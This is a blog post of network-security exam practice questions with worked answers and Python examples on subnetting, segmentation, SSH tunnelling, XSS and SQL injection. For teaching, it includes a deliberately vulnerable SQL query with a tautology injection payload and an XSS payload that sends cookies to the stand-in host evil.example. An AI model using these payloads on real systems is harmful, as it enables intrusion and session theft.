5618 Short-Answer Question Review

Great—here are two short‑answer practice questions in English, aligned with the sample exam’s scope and difficulty. Do not include solutions; show your working where requested. If you use any commands or pseudo‑code, place them in Markdown code blocks.

Question 1 (Subnetting & Network Addressing) [Total 5 marks]
Given the IP address and prefix: 172.16.130.45/20. Answer the following:
a) Write the subnet mask in both decimal and binary forms. In the binary representation of this IP address, clearly indicate the boundary between network bits and host bits. [2 marks]

Subnet mask (decimal): 255.255.240.0
Subnet mask (binary):  11111111.11111111.11110000.00000000
172.16.130.45 -> 10101100.00010000.10000010.00101101
Since the prefix is /20, the first 20 bits are network bits, so the boundary falls inside the third octet (not after the second): 10101100.00010000.1000|0010.00101101

b) Compute the network address and the broadcast address for this subnet. Show your working. [1.5 marks]

10101100.00010000.1000|0010.00101101
network:   clear all 12 host bits -> 10101100.00010000.1000|0000.00000000 -> 172.16.128.0
broadcast: set all 12 host bits   -> 10101100.00010000.1000|1111.11111111 -> 172.16.143.255

c) State the first and last usable host addresses and the total number of usable hosts in this subnet. Show your working. [1.5 marks]

10101100.00010000.1000|0010.00101101
1st usable:  network + 1   -> 10101100.00010000.1000|0000.00000001 -> 172.16.128.1
last usable: broadcast - 1 -> 10101100.00010000.1000|1111.11111110 -> 172.16.143.254
total: 12 host bits, 2^12 - 2 = 4094 usable hosts (the network and broadcast addresses are excluded)
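Worked check for Question 1, as an added example (not part of the original notes): a from-scratch IPv4 subnet calculator in Python that prints the binary boundary, mask, network, broadcast and usable range for any prefix length, and cross-checks itself against the standard library's ipaddress module. The only value taken from the question is 172.16.130.45/20; the /12 case in the demo is added for contrast.

```python
# Added example (not part of the original notes): a from-scratch IPv4 subnet
# calculator for the Question 1 address, cross-checked against the standard
# library's ipaddress module. The only input taken from the page is
# 172.16.130.45/20; the /12 case in the demo is added for contrast.
import ipaddress


def to_int(dotted: str) -> int:
    """Dotted-quad text -> 32-bit integer."""
    octets = [int(o) for o in dotted.split(".")]
    if len(octets) != 4 or not all(0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {dotted}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def to_dotted(value: int) -> str:
    """32-bit integer -> dotted-quad text."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def to_binary(value: int, prefix: int) -> str:
    """Dotted binary with '|' placed after the first `prefix` (network) bits."""
    bits = f"{value:032b}"
    pieces = []
    for i, bit in enumerate(bits):
        if i and i % 8 == 0:
            pieces.append(".")
        if i == prefix:
            pieces.append("|")
        pieces.append(bit)
    if prefix == 32:
        pieces.append("|")
    return "".join(pieces)


def subnet_info(cidr: str) -> dict:
    """Mask, network, broadcast, usable range and host count, computed by hand."""
    ip_text, prefix_text = cidr.split("/")
    prefix = int(prefix_text)
    if not 0 <= prefix <= 32:
        raise ValueError(f"bad prefix length: {prefix}")
    ip = to_int(ip_text)
    host_bits = 32 - prefix
    mask = (0xFFFFFFFF << host_bits) & 0xFFFFFFFF   # prefix ones, then host zeros
    network = ip & mask                              # host bits cleared
    broadcast = network | (~mask & 0xFFFFFFFF)       # host bits set
    usable = max(2 ** host_bits - 2, 0)              # /31 and /32 leave no usable pair
    info = {
        "ip_binary": to_binary(ip, prefix),
        "mask": to_dotted(mask),
        "mask_binary": to_binary(mask, prefix),
        "network": to_dotted(network),
        "broadcast": to_dotted(broadcast),
        "first_usable": to_dotted(network + 1) if usable else None,
        "last_usable": to_dotted(broadcast - 1) if usable else None,
        "usable_hosts": usable,
    }
    # Cross-check the hand computation against the standard library.
    net = ipaddress.ip_network(cidr, strict=False)
    assert str(net.netmask) == info["mask"]
    assert str(net.network_address) == info["network"]
    assert str(net.broadcast_address) == info["broadcast"]
    return info


if __name__ == "__main__":
    for cidr in ("172.16.130.45/20", "172.16.130.45/12"):
        print(cidr)
        for key, val in subnet_info(cidr).items():
            print(f"  {key:>13}: {val}")
```

The /12 case is included because it is the common slip of placing the boundary after the second octet: it yields 172.16.0.0 / 172.31.255.255 and 2^20 - 2 hosts, whereas /20 gives 172.16.128.0 / 172.16.143.255 and 2^12 - 2 = 4094 hosts.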

Question 2 (Data Centre Security Architecture) [Total 9 marks]
A company data centre hosts critical services (databases, web applications, and an email server). The company also develops both internal and customer‑facing applications. Design a secure architecture covering both network and application layers. Use a simple diagram if helpful (ASCII is fine).
a) Network segmentation: Describe how you would segment and isolate critical resources (e.g., user LAN, DMZ, app tier, DB tier, management/jump/bastion). Explain the security benefits. [2 marks]

Segmentation: External → DMZ (reverse proxy/WAF) → App → DB, with each hop crossing a firewall; separate Mgmt/Bastion and Backup networks; least-privilege ACLs between tiers (segmentation and ACLs). Benefit: a compromised DMZ or web host cannot reach the DB tier directly, so lateral movement is confined to the flows the ACLs explicitly allow.
Zero Trust: verify every user and device on every request; IAM/MFA + ACLs + microsegmentation (zero trust).
Defense-in-Depth: multiple independent controls across layers, so a single failed control does not expose the assets (defense in depth, layered controls).

b) Firewall placement and types: Specify where you would place firewalls/security controls (e.g., stateful firewall, NGFW, WAF, email security gateway) and how they control traffic. Justify your choice of firewall type(s). [3 marks]

Firewalls: edge NGFW at the Internet boundary (stateful inspection + App-ID + IPS, so traffic is allowed by application rather than by port alone); stateful firewalls / east–west microsegmentation between the DMZ, App and DB tiers so that only the expected tier-to-tier flows pass; WAF in front of the web applications for L7 (HTTP) attacks such as XSS and SQLi; email security gateway in the DMZ in front of the mail server for spam/phishing/malware filtering (firewall placement and justification).
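As an added example for (a) and (b), not part of the original notes: the segmentation and firewall placement above expressed as a default-deny, zone-to-zone allow-list in Python, with a lint pass that rejects tier-skipping rules (Internet straight to App/DB, anything other than App/Bastion/Backup opening sessions to DB, DB or App with direct Internet egress). Zone names, ports, rules and the sample flows are illustrative assumptions, not the configuration of any real data centre.

```python
# Added example (not the original notes): a default-deny zone policy for the
# tiers in Question 2 (a) and (b), plus a lint pass that rejects tier-skipping
# rules before they are deployed. Zone names, ports, rules and sample flows are
# illustrative assumptions, not a real data centre's configuration.
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Rule:
    src: str
    dst: str
    proto: str
    port: int
    note: str


# Explicit allow-list; a flow that matches no rule is denied.
POLICY = [
    Rule("internet", "dmz",     "tcp", 443,  "reverse proxy / WAF terminates TLS"),
    Rule("internet", "dmz",     "tcp", 25,   "email security gateway accepts inbound SMTP"),
    Rule("dmz",      "app",     "tcp", 8443, "proxy forwards only to the app tier"),
    Rule("dmz",      "mail",    "tcp", 25,   "gateway relays scanned mail to the mail server"),
    Rule("app",      "db",      "tcp", 5432, "app tier is the only production DB client"),
    Rule("userlan",  "dmz",     "tcp", 443,  "staff use the same public entry as customers"),
    Rule("userlan",  "bastion", "tcp", 22,   "admins reach servers only via the jump host"),
    Rule("bastion",  "dmz",     "tcp", 22,   "admin SSH from the jump host"),
    Rule("bastion",  "app",     "tcp", 22,   "admin SSH from the jump host"),
    Rule("bastion",  "db",      "tcp", 22,   "admin SSH from the jump host"),
    Rule("backup",   "db",      "tcp", 5432, "backup network pulls from the DB tier"),
]

DB_CLIENTS = {"app", "bastion", "backup"}   # the only zones allowed to open sessions to db


def evaluate(src: str, dst: str, proto: str, port: int) -> Tuple[str, str]:
    """Return ('allow', note) on an explicit match, else ('deny', reason)."""
    for r in POLICY:
        if (r.src, r.dst, r.proto, r.port) == (src, dst, proto, port):
            return "allow", r.note
    return "deny", f"no rule for {src}->{dst} {proto}/{port} (default deny)"


def lint_policy(policy: List[Rule] = POLICY) -> List[str]:
    """Structural invariants the segmentation design relies on."""
    problems = []
    for r in policy:
        if r.src == "internet" and r.dst != "dmz":
            problems.append(f"internet reaches {r.dst} directly: {r}")
        if r.dst == "db" and r.src not in DB_CLIENTS:
            problems.append(f"{r.src} may open {r.proto}/{r.port} to db: {r}")
        if r.src in {"db", "app"} and r.dst == "internet":
            problems.append(f"{r.src} tier has direct Internet egress: {r}")
    return problems


# Constructed sample flows: the first four are what a compromised host would try.
SAMPLE_FLOWS = [
    ("internet", "app", "tcp", 8443),   # bypassing the DMZ
    ("dmz", "db", "tcp", 5432),         # proxy trying to reach the DB directly
    ("userlan", "db", "tcp", 5432),     # staff workstation straight to the DB
    ("db", "internet", "tcp", 443),     # DB tier calling out (exfiltration)
    ("internet", "dmz", "tcp", 443),
    ("app", "db", "tcp", 5432),
    ("bastion", "db", "tcp", 22),
]


def report(flows=SAMPLE_FLOWS) -> List[str]:
    """One verdict line per flow, in order."""
    lines = []
    for src, dst, proto, port in flows:
        verdict, why = evaluate(src, dst, proto, port)
        lines.append(f"{verdict:5} {src:>8} -> {dst:<8} {proto}/{port:<5} {why}")
    return lines


if __name__ == "__main__":
    assert lint_policy() == [], lint_policy()
    print("\n".join(report()))
```

The point of lint_policy is that the invariants (no Internet-to-App, no non-App client of the DB, no DB egress) are checked against the rule set itself, not just against individual flows, so a later "temporary" rule that opens internet -> db is caught before it reaches a firewall.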

c) Encryption: Indicate where to apply encryption (in transit and at rest), which protocols/algorithms you would use, and outline key management considerations. [2 marks]

Encryption: TLS 1.2+/1.3 everywhere in transit, including internal tier-to-tier links and database connections; at rest: full-disk/volume encryption plus DB TDE (AES-256); keys kept in a KMS/HSM separate from the data, with rotation, auditing and least-privilege access to key operations (encryption in transit/at rest and key management).

d) Secure coding practices: Provide at least two key practices (e.g., SAST/DAST, dependency management/SBOM, secret management, least privilege, input validation/output encoding, CI/CD security gates) and explain how they reduce risk. [2 marks]

Secure coding: input validation + context-aware output encoding (blocks XSS); parameterized queries (block SQLi); CSRF defenses such as anti-CSRF tokens and SameSite cookies; secrets management (no secrets in source or CI logs); least-privileged tokens; SAST, dependency and secret scanning as CI/CD gates, so vulnerable code and known-bad dependencies never reach production (secure development practices).
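Added example for (d), not part of the original notes: the "parameterized queries" practice shown as a deliberately vulnerable string-built query beside its parameterized fix, run against an in-memory SQLite table. The table, its rows and the injection payload are constructed for the demo.

```python
# Added example (not part of the original notes): the "param queries" practice
# from (d), shown as a deliberately vulnerable string-built query beside its
# parameterized fix, run against an in-memory SQLite table with constructed rows.
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users, one of them an admin."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    con.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                    [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return con


def find_user_vulnerable(con: sqlite3.Connection, name: str) -> List[Tuple]:
    """Deliberately vulnerable: the caller's string becomes part of the SQL text."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return con.execute(sql).fetchall()


def find_user_safe(con: sqlite3.Connection, name: str) -> List[Tuple]:
    """Parameterized: the driver binds the value; it is never parsed as SQL."""
    return con.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


PAYLOAD = "' OR '1'='1"   # constructed injection input: closes the quote, adds a tautology


def demo() -> dict:
    """Run both lookups with a normal name and with the payload."""
    con = make_db()
    return {
        "normal_vulnerable": find_user_vulnerable(con, "bob"),
        "normal_safe": find_user_safe(con, "bob"),
        "payload_vulnerable": find_user_vulnerable(con, PAYLOAD),  # every row leaks
        "payload_safe": find_user_safe(con, PAYLOAD),              # no such user
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key:>18}: {rows}")
```

With the payload, the vulnerable query becomes `SELECT name, role FROM users WHERE name = '' OR '1'='1'` and returns every user including the admin; the parameterized version looks for a user literally named `' OR '1'='1` and returns nothing.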

When you’re ready, submit your answers and I’ll grade them with detailed feedback.


Great—here’s a fresh set of short‑answer practice questions (no subnetting), aligned with your sample exam. I include brief “Cheatsheet cues” so you can jump to the right sections. No answers provided—send me your attempts and I’ll grade with detailed feedback.

Question 1 — Proxies, SSH Tunneling, and VPN [Total 6 marks]
A remote engineer needs to:
a) Access a single internal Jenkins UI at http://jenkins.int.local:8080 through a reachable bastion. Provide the most suitable technique, one example command, and why it fits. [2 marks]

Cheatsheet line: Local (-L): bind a local port -> one specific internal service; best for a single internal web/DB service (single-service direct access, frequently examined).
[example] ssh -L 33306:db.internal:3306 user@jump -N (local 33306 -> internal db:3306) [example] temporary access to an internal database
Reason: the target is reached through a reachable bastion, so it is ssh -L. For this question the same form points at the Jenkins host: ssh -L 8080:jenkins.int.local:8080 user@bastion -N, then browse http://localhost:8080 (user@bastion is a placeholder for the real bastion login).

b) Browse multiple internal web apps and use Git/SSH over one tunnel. Provide the technique, one example command, and why it fits. [2 marks]

Cheatsheet line: Dynamic (-D): local SOCKS proxy -> many protocols/destinations through one tunnel (dynamic = SOCKS, many targets).
[example] ssh -D 1080 user@jump -N -> apps use SOCKS5 127.0.0.1:1080 (browse several internal sites / Git / SSH; the browser is pointed at the SOCKS proxy, and Git-over-SSH goes through it via a ProxyCommand)
Reason: one tunnel, many destinations, so it is -D

c) Allow a build runner in the VPC to fetch artifacts from the engineer’s laptop (laptop is behind NAT; engineer can SSH into the runner). Provide the technique, one example command, and why it fits. [2 marks]

Cheatsheet line: Reverse (-R): the remote end listens -> connections are forwarded back to your local service (reverse forwarding; lets the remote side reach your local machine).
[example] ssh -R 0.0.0.0:2222:127.0.0.1:22 user@vps -N (remote 2222 -> local 22) [example] call-back from behind NAT; binding a non-loopback address on the remote side requires GatewayPorts yes in that host's sshd_config, otherwise the listener is bound to 127.0.0.1 only
Reason: the remote host (the runner) must connect back to the client, so it is -R; for this question the engineer serves the artifacts on a local port and forwards a port on the runner to it, so the runner fetches from its own localhost.

Question 2 — Web Security: XSS vs CSRF vs SQLi vs RCE [Total 8 marks]
For each scenario, identify the most likely vulnerability class and give one key mitigation (1–2 lines each):
a) A comment field stores and reflects unescaped HTML so that other users’ browsers execute attacker code stealing cookies. [2 marks]

XSS: injected script runs in the victim's browser; impact: cookie/token theft, session hijacking, defacement (the script executes in the victim's browser).
Defend: context-aware output encoding at every sink (HTML text, attribute, JS string, URL); CSP (restrict script-src); HttpOnly/SameSite cookies (HttpOnly limits cookie theft but does not stop the script from running); validate/normalize input (encode at output points per context / CSP / HttpOnly+SameSite / input validation).
Examples:

  • Encode HTML text:
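The original example list is cut off at this point. As an added example (not part of the original notes), here is the context-aware encoding described above in Python: the same attacker comment rendered unencoded, in HTML text context, in an attribute, and inside a JS string, plus the CSP and cookie headers that back the encoding up. The template, the header values and the payload are constructed for illustration; the encoding uses only html.escape and json.dumps from the standard library.

```python
# Added example (not from the original notes, whose own example list is cut off
# above): context-aware output encoding for a stored comment, using only
# html.escape and json.dumps from the standard library. The page template,
# the header values and the attacker payload are constructed for illustration.
import html
import json

# Constructed stored comment from an attacker: exfiltrates document.cookie.
PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'


def render_unsafe(comment: str) -> str:
    """Vulnerable: the stored comment is reflected verbatim into the HTML body."""
    return f'<div class="comment">{comment}</div>'


def render_html_text(comment: str) -> str:
    """HTML text context: &, <, > and both quote characters are encoded, so no tag can start."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_attribute(comment: str) -> str:
    """Attribute context: the value must be quoted AND encoded; an unquoted attribute is not safe."""
    return f'<div class="comment" title="{html.escape(comment, quote=True)}"></div>'


def render_js_string(comment: str) -> str:
    """JS string context: json.dumps yields a valid JS literal; escaping < and >
    keeps a literal </script> inside the data from closing the script element."""
    literal = json.dumps(comment).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var comment = {literal};</script>"


# Browser-side backstops that go with the encoding, as HTTP response headers.
CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"
COOKIE_HEADER = "Set-Cookie: session=c0nstructedvalue; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    renderers = [("unsafe", render_unsafe), ("html_text", render_html_text),
                 ("attribute", render_attribute), ("js_string", render_js_string)]
    for name, fn in renderers:
        out = fn(PAYLOAD)
        print(f"{name:>10} payload_survives={PAYLOAD in out}  {out}")
    print(CSP_HEADER)
    print(COOKIE_HEADER)
```

render_js_string escapes < and > inside the JSON literal on purpose: json.dumps alone produces valid JavaScript, but the HTML parser runs first and would end the script element at a literal `</script>` inside the string, so the encoding has to satisfy both the HTML and the JS context.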
Tags: Blog, Typecho, AutoUpload
Article title: 5618 Short-Answer Question Review
Article link: https://www.fangshaonian.cn/archives/148/
Last edited: 26 November 2025, 02:58, by 方少年
License: CC BY-NC-SA 4.0 (Attribution-NonCommercial-ShareAlike 4.0 International)